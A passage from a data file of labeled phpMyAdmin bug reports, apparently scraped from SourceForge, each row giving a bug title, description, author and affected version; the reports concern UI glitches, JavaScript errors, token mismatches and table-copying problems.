Original URL https sourceforge.net p phpmyadmin bugs 4380 Original author mokraemer Found in version 4.1.12","bug"
"24444","10783","Some of the data stored in configuration storage are not deleted upon db or table delete.
For example recent additions such as central column list is not cleaned up upon database or table) delete Original URL https sourceforge.net p phpmyadmin bugs 4678 Original author madhuracj Found in version 4.3.0","bug"
"24444","10784","Central columns table field in setup does not have a description.
Original URL https sourceforge.net p phpmyadmin bugs 4681 Original author madhuracj Found in version 4.3.0","bug"
"24444","10785","Cannot remove the last remembered sorted column.
When the RememberSorting directive is set, the UI remembers the sorted column, even if the user tries to remove it via the new shift click action.
Original URL https sourceforge.net p phpmyadmin bugs 4381 Original author lem9 Found in version 4.2.0","bug"
"24444","10786","Incorrect Rows total shown when truncating or dropping a table on DB Structure page..
When truncating or dropping a table from DB Structure page, the Sum of table Rows at the bottom gets updated and shows an incorrect value.
Original URL https sourceforge.net p phpmyadmin bugs 4384 Original author ashut0sh Found in version 4.2.0","bug"
"24444","10787","Export with AUTO INCREMENT column fails to import.
Create a table with a primary key and AUTO INCREMENT column.
Copy this table.
In MySQL 5.0 you get an error that its not possible to create a AI with no key in MySQL 5.6 it ignores this problem and doesn t add at the AI property to the column.
I think the problem is that phpmyadmin changed the export from primary key in the create statement to a separated sql query alter table add primary) Original URL https sourceforge.net p phpmyadmin bugs 4386 Original author lord rod Found in version 4.2.0","bug"
"24444","10788","Token mismatch one server http auth, one cookie).
When 2 installs of phpmyadmin on the same server one with http mode the other with cookie).
In one case it s impossible make any action.
I can switch of serveur in http mode) but impossible to make any action coz Erreur disparitxc3xa9 du jeton , token miss match in english i guess.
Even if F5 same if switch with the phpmyadmin with cookie mode Original URL https sourceforge.net p phpmyadmin bugs 4387 Original author aurelienlequoy Found in version 4.1.14","bug"
"24444","10789","Disable database expansion when enabled throws Error 500 when database name is clicked in navigation tree.
After disabling the database expansion > when database is selected from navigation panel, it loads the page but gives an internal server error 500) additionally.
Original URL https sourceforge.net p phpmyadmin bugs 4388 Original author chirayu45 Found in version 4.2.0 Attachment http sourceforge.net p phpmyadmin bugs 4388 attachment snapshot1.png","bug"
"24444","10790","Data type changing by itself no size but attribute present).
Hi, this is very frustrating problem.
I try to upgrade from last 4.1. to 4.2.0, to check if problem is solved, but not.
I thinked, that phpmyadmin randomly changes date types to int 10), but now I know, where is problem.
For example, I have created structure row with datetype float .
Now I want to add Comment or something else, so I am clicking on edit , typing something to comment and saving.
Datetype is now int 10).
Problem is, that when i click to edit , datetype int is automaticaly selected, not float .
Why?
I think, this is a bug.
Original URL https sourceforge.net p phpmyadmin bugs 4390 Original author lucius silencio Found in version 4.2.0","bug"
"24444","10791","Designer breaks without configuration storage.
If I try using the designer mode without configuration storage.
It shows relation lines with end points at random places as shown in attachment.
Moving any of the table redraws the lines correctly.
It happens every time the designer page is reopened from the menu.
It happens when configuration storage is not configured.
If it is configured, designer mode draws the lines correctly first time also.
Original URL https sourceforge.net p phpmyadmin bugs 4687 Original author nisargjhaveri Found in version 4.3.0 Attachment http sourceforge.net p phpmyadmin bugs 4687 attachment pma designer.png","bug"
"24444","10792","Upgraded to 4.2.0, insanely slow now.
Just upgraded to 4.2.0 from 4.1.13 and the speed is insanely slow.
To render the main page after you log in) taking greater than 15 seconds.
Is this a know bug?
Original URL https sourceforge.net p phpmyadmin bugs 4391 Original author justink101 Found in version 4.2.0","bug"
"24444","10793","js error on marking table as favorite in Safari in private mode).
QuotaExceededError DOM Exception 22 An attempt was made to add something to storage that exceeded the quota.
See https reports.phpmyadmin.net reports view 3294 Original URL https sourceforge.net p phpmyadmin bugs 4694 Original author atul5 Found in version 4.3.6","bug"
"24444","10794","Cannot see databases in nav panel on databases grouping when disabled database expansion.
When disable database expansion is set true, if there exists a database group then databases inside that group cannot be selected from nav.
panel as they are grouped and that group is no more expandable.
Original URL https sourceforge.net p phpmyadmin bugs 4392 Original author chirayu45 Found in version 4.2.0 Attachment http sourceforge.net p phpmyadmin bugs 4392 attachment pma nav group.png","bug"
"24444","10795","Server Status refresh not behaving as expected.
To reproduce the bug follow these steps 1.
Go to Server >Status >Processes 2.
Start the auto refresh feature 3.
Set the refresh rate to 20 min 4.
Change the refresh rate to 2 sec We expect the refresh to happen after 2 sec of change in refresh rate but it wait for a refresh to happen in 20 min and only then it refreshes for every 2 sec.
Original URL https sourceforge.net p phpmyadmin bugs 4697 Original author vigneshpanneer Found in version 4.3.6","bug"
"24444","10796","Prompt about navigating away when creating table.
I get the prompt Are you sure you want to navigate away from this page?
Press OK to continue or Cancel to stay on the current page.
when trying to create a new table.
To reproduce Go to the interface to create a table structure The easiest way is to create a new database then select that database from the navigation pan.
In the Create table dialog enter a table name and 1 column, then click Go.
The resulting page asks for Name, Type, Length Values, etc).
Enter some data.
Press Save.
The table is created as expected either way, but the prompt is shown and should not be.
It appears as if the problem begins with 4b8574aa4a5945c1ca5685592e4889d808b0299a.
Original URL https sourceforge.net p phpmyadmin bugs 4393 Original author ibennetch Found in version Latest Git","bug"
"24444","10797","Drop db confirmation message when dropping a user.
As reported by J.M., when dropping a user from the Users page, if one selects the Drop the databases that have the same names as the users.
checkbox, the confirmation message appears immediately.
It probably should only be displayed when clicking Go.
Original URL https sourceforge.net p phpmyadmin bugs 4394 Original author ibennetch Found in version 4.2.2","bug"
"24444","10798","BLOB link transformation is broken.
As first reported by J.M., with the current master and for some time prior, following the link of a JPEG BLOB with the link browser transformation doesn t work.
It doesn t seem to do anything and may trigger a JavaScript error at[1].
For some reason, git bisect says db22f56fd2584508bc77cb03922020183ac8bb49 is the first bad commit, but that was a small update to Documentation.html, so I don t know.
The problem appeared after RELEASE 3 5 8 2 and before QA 4 0.
1 https reports.phpmyadmin.net reports view 2493 Original URL https sourceforge.net p phpmyadmin bugs 4395 Original author ibennetch Found in version Latest Git","bug"
"24444","10799","Problem copying constraints such as Sakila).
As reported by J.M., there is a problem when copying databases with constraints in some cases.
For instance, trying to duplicate the sakila database gives this message > ALTER TABLE address ADD CONSTRAINT fk address city FOREIGN KEY city id) REFERENCES city city id) ON UPDATE CASCADE; 8cf74b688d882a9545a651498664de912c7fb659 is the first bad commit.
Original URL https sourceforge.net p phpmyadmin bugs 4396 Original author ibennetch Found in version 4.2.1","bug"
"24444","10800","Reload button in navigation pane expands everything.
Clicking the Reload button in the navigation pane also expands every available database and table.
This is probably not desired.
Original URL https sourceforge.net p phpmyadmin bugs 4397 Original author ibennetch Found in version Latest Git","bug"
"24444","10801","Creating table asks to confirm leaving the page.
When creating table, you will get asked to confirm leaving the page even if you have just submitted it.
Original URL https sourceforge.net p phpmyadmin bugs 4399 Original author nijel Found in version Latest Git","bug"
"24444","10802","Asks about leaving the page after altering table.
The confirmation dialog appears when leaving page after altering table.
To reproduce Open some table structure Choose to add 1 field Fill in field value and add it The confirmation page appears that field has been added Try navigating out of that page and you get the confirmation Original URL https sourceforge.net p phpmyadmin bugs 4400 Original author nijel Found in version Latest Git","bug"
"24444","10803","Renaming table asks for confirmation.
Another page leaving confirmation Open table operations Change table name to move it Submit the form and you get the confirmation Original URL https sourceforge.net p phpmyadmin bugs 4401 Original author nijel Found in version Latest Git","bug"
"24444","10804","Unsaved schema page exported as pdf.pdf.
Moreover, difference export types uses different file names Original URL https sourceforge.net p phpmyadmin bugs 4703 Original author madhuracj Found in version 4.3.0","bug"
"24444","10805","reCaptcha is not displayed, login impossible under firefox 29.0.1.
I just upgraded to 4.2.0 and add my config.
Now I can t login with firefox 29.0.1.
I enter my credentials and send them, but the site is just reloading and I see the blank login screen again.
I also registered, that reCaptcha is not shown anymore.
Maybe that s the problem?)
With internet explorer v 11.0.9600.17105) everything works fine.
PMA 4.2.0 Apache 2.2.22 Debian) PHP Version 5.5.12 1 dotdeb.1 MySQL 5.6.17 1 dotdeb.1 Debian) Firefox 29.0.1 Original URL https sourceforge.net p phpmyadmin bugs 4402 Original author serecords Found in version 4.2.0","bug"
"24444","10806","DisableIS enabled, only shows information schema db..
When I enable DisableIS, in the navigation pane displays only the basic information schema even if I place the base information schema in the variable hide db , it still appears in phpMyAdmin.
I m using phpmyadmin 4.3.6.
Original URL https sourceforge.net p phpmyadmin bugs 4704 Original author j4m3sbr Found in version 4.3.6","bug"
"24444","10807","Cannot import open basedir).
From Harald Reindl import.php tmp subdir = sys get temp dir ); 4.2.0 complains about not writeable tmp while the identical server envirnoment worked before no sane sever configuration ever allows systems tmp to be accessable on a shared server define a temp dir inside the phpMyAdmin tree or just try try is writable ini get upload tmp dir )) and store there whatever you want but the change in 4.2.0 is broken by design i just did one change open basedir = ; because i need now to import some dumps and even tmp subdir = DIR .
tmp ; while this directory exists, has write permissions and is for sure in the open basedir because otherwise phpMyAdmin could not be loaded gives the same error with usr share phpMyAdmin tmp instead just tmp skip the complete open basedir check results in working as the last 10 years ago what i don t get is how someone assumes system temp is available for a webserver Original URL https sourceforge.net p phpmyadmin bugs 4405 Original author lem9 Found in version 4.2.1","bug"
"24444","10808","JS Error with enum Edit Enum Set values .
might be related to 4380, since the field contains special chars { exception { mode onerror , message Uncaught exception TypeError Cannot convert compareField.parentNode to object , stack [ { line 56 , func ?
, uri ?
, scriptname null } ], useragent Opera 9.80 X11; Linux x86 64) Presto 2.12.388 Version 12.16 , name exception , uri tbl structure.php?target= }, script name tbl structure.php , pma version 4.2.1 , browser name OPERA , browser version 9.80 , user os Linux , server software Apache 2.4.7 Mageia) , user agent string Opera 9.80 X11; Linux x86 64) Presto 2.12.388 Version 12.16 , locale de , configuration storage enabled , php version 5.5.11 , microhistory { pages [ { hash db structure.php?db=drkmz webEdition table= server=1 target= token=dced5d569e2c18ce87b03c9cdae43a8b }, { hash tbl structure.php?db=drkmz webEdition table=rdShopItems server=1 target= token=dced5d569e2c18ce87b03c9cdae43a8b , params { opendb url db structure.php , safari browser 0 , querywindow height 400 , querywindow width 600 , collation connection utf8mb4 general ci , lang de , server 1 , text dir ltr , pma text default tab Struktur , pma text left default tab Struktur , confirm true } }, { hash tbl addfield.php?db=drkmz webEdition table=rdShopItems server=1 target= token=dced5d569e2c18ce87b03c9cdae43a8b , params { opendb url db structure.php , safari browser 0 , querywindow height 400 , querywindow width 600 , collation connection utf8mb4 general ci , lang de , server 1 , text dir ltr , pma text default tab Struktur , pma text left default tab Struktur , confirm true } }, { hash tbl sql.php?db=drkmz webEdition table=rdShopItems server=1 target= token=dced5d569e2c18ce87b03c9cdae43a8b , params { opendb url db structure.php , safari browser 0 , querywindow height 400 , querywindow width 600 , collation connection utf8mb4 general ci , lang de , server 1 , text dir ltr , pma text default tab Struktur , pma text left default tab Struktur , confirm true } }, { hash sql.php?db=drkmz webEdition table=rdShopItems server=1 target= token=dced5d569e2c18ce87b03c9cdae43a8b , params { opendb url db structure.php , safari browser 0 , querywindow height 400 , querywindow width 600 , collation connection utf8mb4 general ci , lang de , server 1 , text dir ltr , pma text default tab Struktur , pma text left default tab Struktur , confirm true } }, { hash tbl structure.php?db=drkmz webEdition table=rdLagerbestand server=1 target= token=dced5d569e2c18ce87b03c9cdae43a8b , params { opendb url db structure.php , safari browser 0 , querywindow height 400 , querywindow width 600 , collation connection utf8mb4 general ci , lang de , server 1 , text dir ltr , pma text default tab Struktur , pma text left default tab Struktur , confirm true } }, { hash tbl structure.php?db=drkmz webEdition table=rdShopItems server=1 target= token=dced5d569e2c18ce87b03c9cdae43a8b , params { opendb url db structure.php , safari browser 0 , querywindow height 400 , querywindow width 600 , collation connection utf8mb4 general ci , lang de , server 1 , text dir ltr , pma text default tab Struktur , pma text left default tab Struktur , confirm true } } ], current index 7 } } Original URL https sourceforge.net p phpmyadmin bugs 4407 Original author mokraemer Found in version 4.2.1","bug"
"24444","10809","If enum item use Chinese character, phpMyAdmin cannot show table structure..
If enum item use Chinese character, phpMyAdmin cannot show table structure.
My table structure CREATE TABLE IF NOT EXISTS `bytecoin reward` `reward id` int 10) unsigned NOT NULL AUTO INCREMENT COMMENT xe5xa5x96xe5x8axb1xe7xbcx96xe5x8fxb7 , `user id` int 10) unsigned NOT NULL COMMENT xe7x94xa8xe6x88xb7xe7xbcx96xe5x8fxb7 , `reward type` enum xe6xb3xa8xe5x86x8c , xe5x85x85xe5x80xbc , xe7xbbx91xe5xaex9axe9x82xaexe7xaexb1 , xe7xbbx91xe5xaex9axe6x89x8bxe6x9cxba , xe7xbbx91xe5xaex9aQQ , xe9x82x80xe8xafxb7xe6xb3xa8xe5x86x8c , xe9x82x80xe8xafxb7xe5x85x85xe5x80xbc , xe9x82x80xe8xafxb7xe5x8axa0xe7xbexa4 , xe5x8fx91xe8xaexbaxe5x9dx9b , xe5x8fx91xe7x99xbexe5xbaxa6xe7x9fxa5xe9x81x93 , xe5x8fx91xe7x99xbexe5xbaxa6xe8xb4xb4xe5x90xa7 , xe5x85xb6xe4xbbx96 ) NOT NULL, `reward time` timestamp NOT NULL DEFAULT CURRENT TIMESTAMP COMMENT xe5xa5x96xe5x8axb1xe6x97xb6xe9x97xb4 , `reward rmb` decimal 10,2) unsigned NOT NULL DEFAULT 0.00 COMMENT xe4xbaxbaxe6xb0x91xe5xb8x81xe5xa5x96xe5x8axb1 , `reward byc` decimal 18,2) unsigned NOT NULL DEFAULT 0.00 COMMENT xe7x99xbexe7x89xb9xe5xb8x81xe5xa5x96xe5x8axb1 , `reward operater` int 10) unsigned DEFAULT NULL COMMENT xe5xa5x96xe5x8axb1xe5x8fx91xe6x94xbexe4xbaxba , `reward remark` varchar 255) DEFAULT NULL COMMENT xe5xa4x87xe6xb3xa8 , `reward remark2` int 11) DEFAULT NULL COMMENT xe5xa4x87xe6xb3xa82,xe9x82x80xe8xafxb7xe6xb3xa8xe5x86x8cxe5x92x8cxe5x85x85xe5x80xbcxe5xa5x96xe5x8axb1xe4xb8xbaxe7x94xa8xe6x88xb7ID,xe5x8fx91xe8xaexbaxe5x9dx9bxe5xa5x96xe5x8axb1xe4xb8xbaxe5x8fx91xe5xb8x96xe6x95xb0,QQxe9x82x80xe8xafxb7xe5xa5x96xe5x8axb1xe4xb8xbaxe9x82x80xe8xafxb7xe7x94xa8xe6x88xb7xe6x95xb0 , PRIMARY KEY `reward id`), KEY `fk reward operater` `reward operater`), KEY `fk reward user id` `user id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT= xe5xa5x96xe5x8axb1xe8xa1xa8 AUTO INCREMENT=3 ; Original URL https sourceforge.net p phpmyadmin bugs 4408 Original author bytecoin Found in version 4.2.0","bug"
"24444","10810","Not displaying results of archive table.
Trying to display results from an archive table causes an internal server error due to maximum execution time PHP message PHP Fatal error Maximum execution time of 30 seconds exceeded in usr share phpmyadmin libraries DisplayResults.class.php on line 197 Showing the results by command line works fine.
Additional information Data in table 1,1 MiB Entries 49,291 Line length 22 B Original URL https sourceforge.net p phpmyadmin bugs 4409 Original author mokraemer Found in version 4.2.1","bug"
"24444","10811","js error s when sql command is executed.
in this case, I clicked on inline to change the sql statement.
but this also happend after executing an sql query to add a table.
{ exception { mode onerror , message Uncaught exception TypeError Cannot convert compareField.parentNode to object , stack [ { line 56 , func ?
, uri ?
, scriptname null } ], useragent Opera 9.80 X11; Linux x86 64) Presto 2.12.388 Version 12.16 , name exception , uri tbl sql.php?target= }, script name tbl sql.php , pma version 4.2.1 , browser name OPERA , browser version 9.80 , user os Linux , server software Apache 2.4.7 Mageia) , user agent string Opera 9.80 X11; Linux x86 64) Presto 2.12.388 Version 12.16 , locale de , configuration storage enabled , php version 5.5.11 , microhistory { pages [ { hash sql.php?db=mokraemer test table=qmChangelog server=1 target= token=0d52f18a98e547661071559d6b8112ca }, { hash tbl operations.php?db=mokraemer test table=qmChangelog server=1 target= token=0d52f18a98e547661071559d6b8112ca , params { opendb url db structure.php , safari browser 0 , querywindow height 400 , querywindow width 600 , collation connection utf8mb4 general ci , lang de , server 1 , text dir ltr , pma text default tab Struktur , pma text left default tab Struktur , confirm true } }, { hash db structure.php?db=mokraemer test table= server=1 target= token=0d52f18a98e547661071559d6b8112ca , params { opendb url db structure.php , safari browser 0 , querywindow height 400 , querywindow width 600 , collation connection utf8mb4 general ci , lang de , server 1 , text dir ltr , pma text default tab Struktur , pma text left default tab Struktur , confirm true } }, { hash db sql.php?db=mokraemer test table= server=1 target= token=0d52f18a98e547661071559d6b8112ca , params { opendb url db structure.php , safari browser 0 , querywindow height 400 , querywindow width 600 , collation connection utf8mb4 general ci , lang de , server 1 , text dir ltr , pma text default tab Struktur , pma text left default tab Struktur , confirm true } }, { hash tbl structure.php?db=mokraemer test table=qmChangelog server=1 target= token=0d52f18a98e547661071559d6b8112ca , params { opendb url db structure.php , safari browser 0 , querywindow height 400 , querywindow width 600 , collation connection utf8mb4 general ci , lang de , server 1 , text dir ltr , pma text default tab Struktur , pma text left default tab Struktur , confirm true } }, { hash tbl sql.php?db=mokraemer test table=qmChangelog server=1 target= token=0d52f18a98e547661071559d6b8112ca , params { opendb url db structure.php , safari browser 0 , querywindow height 400 , querywindow width 600 , collation connection utf8mb4 general ci , lang de , server 1 , text dir ltr , pma text default tab Struktur , pma text left default tab Struktur , confirm true } } ], current index 6 } } Original URL https sourceforge.net p phpmyadmin bugs 4410 Original author mokraemer Found in version 4.2.1","bug"
"24444","10812","Wrongly positioned date picker while Grid Editing.
Steps to reproduce Table SQL CREATE TABLE `datepicker bug` `id` int 10) NOT NULL AUTO INCREMENT, `time stamp` timestamp NOT NULL, PRIMARY KEY `id`) ) ENGINE=InnoDB AUTO INCREMENT=4 DEFAULT CHARSET=latin1 1.
Insert a row in the above table.
2.
Try to edit the `timestamp` column, date picker will appear.
3.
Hide it by clicking on the calendar icon next to the date field.
4.
Try to display it by clicking again on the same calendar icon, it will appear somewhere at the bottom of the page.
Original URL https sourceforge.net p phpmyadmin bugs 4712 Original author ashut0sh Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 4712 attachment datepicker bug.png","bug"
"24444","10813","Protect Binary Columns many problems.
1) Protect Binary Columns when to set to no from Settings > Main Panel > Edit Mode does not allow editing Binary columns but allows editing BLOB which is not desired behaviour.
It should allow insert edit on both Binary and BLOB).
2) When set to noblob , it does not allow editing of BLOB Column and Binary both.
it should allow insert edit on BLOB).
3) You can only edit Binary type columns when it is configured to Blob .
Desired Behaviour of configuration is here http docs.phpmyadmin.net en latest config.html cfg ProtectBinary Original URL https sourceforge.net p phpmyadmin bugs 4411 Original author chirayu45 Found in version 4.2.0","bug"
"24444","10814","about leaving the page after updating row data from browse tab.
Steps to reproduce 1) Go to Browse tab of some table 2) Update some value 3) Click on Structure tab try to naivgate away from page).
Original URL https sourceforge.net p phpmyadmin bugs 4415 Original author chirayu45 Found in version Latest Git","bug"
"24444","10815","New lines are removed when grid editing.
Go to any table where a field has new lines in it.
In my case it s varchar 8000).
Double click the table cell on that field.
The new lines are removed from the field, and clicking away from the field updates it with the new value.
For example if you have this Hello World Double clicking gives you a textarea with HelloWorld Original URL https sourceforge.net p phpmyadmin bugs 4416 Original author svivian Found in version 4.3.4","bug"
"24444","10816","Single clicking a foreign key causes JavaScript error.
On the Browse page I get a JavaScript error if I single click a link to a foreign key.
For instance, go to `sakila` database, `staff` table, and click one of the numbers in the `address id` column.
See also https reports.phpmyadmin.net reports view 2545 and https reports.phpmyadmin.net reports view 2546 Git tells me 2f4e53e781b3072b1efb557c8a1eb76ee8010f0e is the first bad commit Original URL https sourceforge.net p phpmyadmin bugs 4417 Original author ibennetch Found in version Latest Git","bug"
"24444","10817","only db not working.
The config option only db is being ignored.
Was ok in 3.4 Original URL https sourceforge.net p phpmyadmin bugs 4719 Original author stevesmith2 Found in version 4.3.7","bug"
"24444","10818","Undefined property stdClass version.
My server s local date time is set to Europe Berlin and I use the latest phpMyAdmin.
The same goes for Undefined property stdClass date Original URL https sourceforge.net p phpmyadmin bugs 4721 Original author remzi1993 Found in version 4.3.7 Attachment http sourceforge.net p phpmyadmin bugs 4721 attachment pma.png","bug"
"24444","10819","When copying databases, primary key attributes get lost.
When copying a database using Operations > Copy database to the primary key info on the target tables gets lost.
In other words, no primary key exists in the new tables anymore and the auto increment property is not set anymore.
The previously primary key column now just contains the values from the source table.
Original URL https sourceforge.net p phpmyadmin bugs 4418 Original author tricksel Found in version 4.2.1","bug"
"24444","10820","Filtered table display only applies to current page.
When filtering the list of tables in a database it only deals with tables currently visible without any way to access tables included in the filter results that appear on other pages.
To Reproduce 1 Select a suitable database in the navigation panel Suitable is one that has many tables that will show with a suitable filter) 2 Find a filterable group that is big enough to require two pages If this doesn t happen immediately, you may be able to change Max Items In Branch to force it 3 Apply the filter While the panel does display the number of tables matching the filter that it hasn t shown, there is no way to reach these.
For example, in you database you have a whole load of tables called MyWork <something> , so applying the filter MyWork shows them to you.
But, there are so many of them that they take up more than one page, either because they happen to start near a page boundary, or there are just more than one page worth of them.
This makes the table filter much less helpful that should could be.
Original URL https sourceforge.net p phpmyadmin bugs 4724 Original author markstanton Found in version 4.3.7","bug"
"24444","10821","No more calendar into search tab.
When I do a search from a table, the option for popup a calendar on a timestamp fields is not anymore there.
Original URL https sourceforge.net p phpmyadmin bugs 4419 Original author jfdionne Found in version 4.2.1","bug"
"24444","10822","UIprefs not working.
table pma table uiprefs is not updated properly.
I solved this with the following file libraries Table.class.php line 1512 <s>.
PMA Util sqlAddSlashes json encode this >uiprefs)) .
, NULL) ;< s> .
PMA Util sqlAddSlashes json encode this >uiprefs)) .
, NOW )) ; This is not limited to phpmyadmin version 4.2.1 Original URL https sourceforge.net p phpmyadmin bugs 4420 Original author timomoisio Found in version 4.2.1","bug"
"24444","10823","Incorrect headings in routine editor.
From Alec Teal It s easy to reproduce , when creating routines, if you choose a function type the table headings make no sense.
Original URL https sourceforge.net p phpmyadmin bugs 4728 Original author lem9 Found in version 4.3.8","bug"
"24444","10824","empty maxInputVars on js messages.php.
Found an issue with js messages.php that was causing all pages to hang.
Since some copies of php return an empty string instead of false when ini get ) fails, it causes a syntax error on messages.php, breaking the entire javascript portion of this software.
I have fixed this issue and will be submitting a pull request.
I am running Ubuntu 12.04 with nginx build 1.1.19 1ubuntu0.6), php build 5.3.10 1ubuntu3.11), and hhvm build 3.0.1 precise) Original URL https sourceforge.net p phpmyadmin bugs 4421 Original author tjcrane Found in version Latest Git","bug"
"24444","10825","Moving fields not working.
Go to a table structure.
Click the pencil icon to edit a field.
Under Move column choose another location.
Click Save.
It should move the column, but it just goes back to the table structure page without doing anything, and the field has not been moved.
Original URL https sourceforge.net p phpmyadmin bugs 4423 Original author svivian Found in version 4.2.1","bug"
"24444","10826","Notice while browsing tables when phpmyadmin pma database exists, but not all the tables.
bug browsing tables when phpmyadmin pma database exists, but not all the tables.
The configuration reports that features based on non existing tables are disabled the way I expect it) but phpmyadmin throws errors,, Notice in .
libraries Table.class.php 1592 Undefined index table uiprefs Backtrace .
libraries Table.class.php 1616 PMA Table >loadUiPrefs ) .
libraries sql.lib.php 236 PMA Table >getUiProp string sorted col ) .
libraries sql.lib.php 2373 PMA handleSortOrder my desactivated tables cfg[ Servers ][ i][ recent ] ... en erreur Tables rxc3xa9cemment utilisxc3xa9es persistantes) Dxc3xa9sactivxc3xa9 cfg[ Servers ][ i][ favorite ] ... en erreur Tables prxc3xa9fxc3xa9rxc3xa9es persistantes) Dxc3xa9sactivxc3xa9 cfg[ Servers ][ i][ table uiprefs ] ... en erreur Prxc3xa9fxc3xa9rences d interface de tables persistantes) Dxc3xa9sactivxc3xa9 cfg[ Servers ][ i][ users ] ... en erreur cfg[ Servers ][ i][ usergroups ] ... en erreur Menus configurables Dxc3xa9sactivxc3xa9 cfg[ Servers ][ i][ navigationhiding ] ... en erreur Cacher montrer des xc3xa9lxc3xa9ments de navigation Dxc3xa9sactivxc3xa9 cfg[ Servers ][ i][ savedsearches ] ... en erreur Enregistrement des recherches requxc3xaate par un exemple) Dxc3xa9sactivxc3xa9 cfg[ Servers ][ i][ central columns ] ... en erreur Gestion de la liste centrale de colonnes Dxc3xa9sactivxc3xa9 Original URL https sourceforge.net p phpmyadmin bugs 4730 Original author pk fr Found in version 4.3.8","bug"
"24444","10827","config parameter db only ignored.
Confifiguration parameter db only is ignored.
This bug persists from 4.3.7 Original URL https sourceforge.net p phpmyadmin bugs 4731 Original author zanzibarneon Found in version 4.3.8","bug"
"24444","10828","Table indexes disappear after altering field.
Note this is different to the bug I just reported, as it occurs on an old PMA where editing the field actually works.)
Go to a table structure view.
Click to edit a field, do some editing then save, You go back to the table structure view, but now the Indexes are not shown.
You need to reload the structure view for the indexes to show.
Original URL https sourceforge.net p phpmyadmin bugs 4424 Original author svivian Found in version 4.2.2","bug"
"24444","10829","Status Monitor popup issues.
RedHat 6.5 PHP 5.3.3 MariaDB 5.5.36 Firefox 29.0.1 1.
The Log statistics popup only works if you re clicking it when at an exact point in the data refreshing cycle.
2.
Then when selecting results From slow log or From general log the time start and time end parameters that are sent are not those that I d input.
Sorry if this is a duplicate or I ve done anything wrong.
This is my first bug report attempt.
Original URL https sourceforge.net p phpmyadmin bugs 4425 Original author ricgreenwood Found in version 4.2.2","bug"
"24444","10830","Cross Database Foreign Key Reference Missing.
In 4.0.10, when adding Foreign key reference, only keys from the current database are shown.
Option is missing to refer to keys from other databases.
Original URL https sourceforge.net p phpmyadmin bugs 4426 Original author wdphd Found in version 4.0.1","bug"
"24444","10831","action icons not in horizontal order.
the action icons in the structure view are not in horizontal order.
to solve this i propose to add a fixed width for ul.table structure action in phpmyadmin themes original css common.css.php fieldsForm ul.table structure actions { margin 0; padding 0; list style none; min width 136px; } Original URL https sourceforge.net p phpmyadmin bugs 4427 Original author philipp2 Found in version 4.0.1","bug"
"24444","10832","Changing display options breaks query highlighting.
Original URL https sourceforge.net p phpmyadmin bugs 4736 Original author madhuracj Found in version 4.3.0","bug"
"24444","10833","Token Mismatch when creating users.
We have an odd bug that is only affecting us whenever we try to create a user.
We can do any number of actions in PMA, but if we try to create a user we get the error Error Token mismatch and are stuck with that until we logout login.
We can modify user permissions, passwords, etc, but cannot initiate a new user creation.
Auth type is cookie , if that matters.
session.save path is set properly and the path is properly permissioned.
Any clue as to what might cause this?
I saw another Bug report for Token Mismatch, but they said it was affecting anything after a long period of idle, this is very specifically once we try to create a user.
I won t be upset if you merge close this bug if it is too much like 3893, I just don t know if the issues are stemming from the same root cause.
Original URL https sourceforge.net p phpmyadmin bugs 4428 Original author rgarre Found in version 4.1.12","bug"
"24444","10834","JS Designer Error.
{ exception { mode onerror , message TypeError myWin is null , stack [ { line 16, func PrintXML , context [ { , var root = data).find root ); , if root.length === 0) { , error , var myWin = window.open , Report , width=400, height=250, resiz ... , var tmp = myWin.document; , tmp.write data); , tmp.close ); , } else { , success , if root.attr act ) == save pos ) { ], filename pmd ajax.js } ], useragent Mozilla 5.0 Windows NT 6.3; WOW64; rv 35.0) Gecko 20100101 Firefox 35.0 , name TypeError , uri pmd general.php?target= }, script name pmd general.php , pma version 4.2.8.1 , browser name FIREFOX , browser version 35.0 , user os Win , server software nginx 1.7.5 , user agent string Mozilla 5.0 Windows NT 6.3; WOW64; rv 35.0) Gecko 20100101 Firefox 35.0 , locale en , configuration storage enabled , php version 5.6.0 , microhistory { pages [ { hash index.php?db= table= server=1 target= token=abe2880f84068ff5013c96620dc791b8 }, { hash db structure.php?db=metalmagdb table= server=1 target= token=abe2880f84068ff5013c96620dc791b8 , params { opendb url db structure.php , safari browser 0 , querywindow height 400 , querywindow width 600 , collation connection utf8mb4 general ci , lang en , server 1 , text dir ltr , pma text default tab Browse , pma text left default tab Structure , confirm true } }, { hash pmd general.php?db=metalmagdb table= server=1 target= token=abe2880f84068ff5013c96620dc791b8 , params { opendb url db structure.php , safari browser 0 , querywindow height 400 , querywindow width 600 , collation connection utf8mb4 general ci , lang en , server 1 , text dir ltr , pma text default tab Browse , pma text left default tab Structure , confirm true } } ], current index 3 } } Original URL https sourceforge.net p phpmyadmin bugs 4737 Original author hellplusc Found in version 4.2.8","bug"
"24444","10835","Why phpmyadmin create 2 primary keys?.
I created a table with 5 fields in Phpmyadmin I defined my pimary key.
But after I clicked on Create , phpmyadmin defined itself 2 other fields as PRIMARYKEY.
So in STRUCTURE view, I click on Primary link to undefine the field as primary key.
then I click on Primary link of the field I want to define as primary key.
Then I click on Primary link to undefine the 2nd field as primary key.
http prntscr.com 3lv5q1 But it doesn t change.
It seems that Phpmyadmin want to decide itself which fileds to make as Primary Key.
I want my field id the primary key and that is all.
why it is so complicate to make such an easy thing!!
I want only one primary key.
Someone can help me?
Original URL https sourceforge.net p phpmyadmin bugs 4429 Original author nino59 Found in version 4.1.8","bug"
"24444","10836","Output of explain is truncated.
Currently strings in the output of EXPLAIN SELECT can be truncated in the displayed HTML table.
This is wrong.
Output of EXPLAIN is not some BLOB gibberish or blog post content that deserves to be truncated for brevity when displaying the contents of a table.
Every last letter of EXPLAIN output is precious and informative.
Please don t truncate it.
Original URL https sourceforge.net p phpmyadmin bugs 4430 Original author rulatir Found in version 4.1.13","bug"
"24444","10837","Wiki page on charts is out of date.
http wiki.phpmyadmin.net pma Charts Original URL https sourceforge.net p phpmyadmin bugs 4431 Original author madhuracj Found in version 4.2.0","bug"
"24444","10838","Error while displaying chart at server level.
Execute the following query server level sql page and try to make a chart.
SELECT 2009 11 AS Month , 225 AS Tele2 , 653 AS Omnitel UNION SELECT 2009 12 , 1157, 855 UNION SELECT 2010 01 , 569, 253 UNION SELECT 2010 02 , 282, 455 UNION SELECT 2010 03 , 2960, 3552 Original URL https sourceforge.net p phpmyadmin bugs 4432 Original author madhuracj Found in version 4.2.2","bug"
"24444","10839","Missing privileges submenu.
Scenario 1.
Display the users list 2.
For one user, click on Edit Privileges 3.
You see the submenu Global | Database | Change password | Login information this is good) 4.
Click on the Database submenu 5.
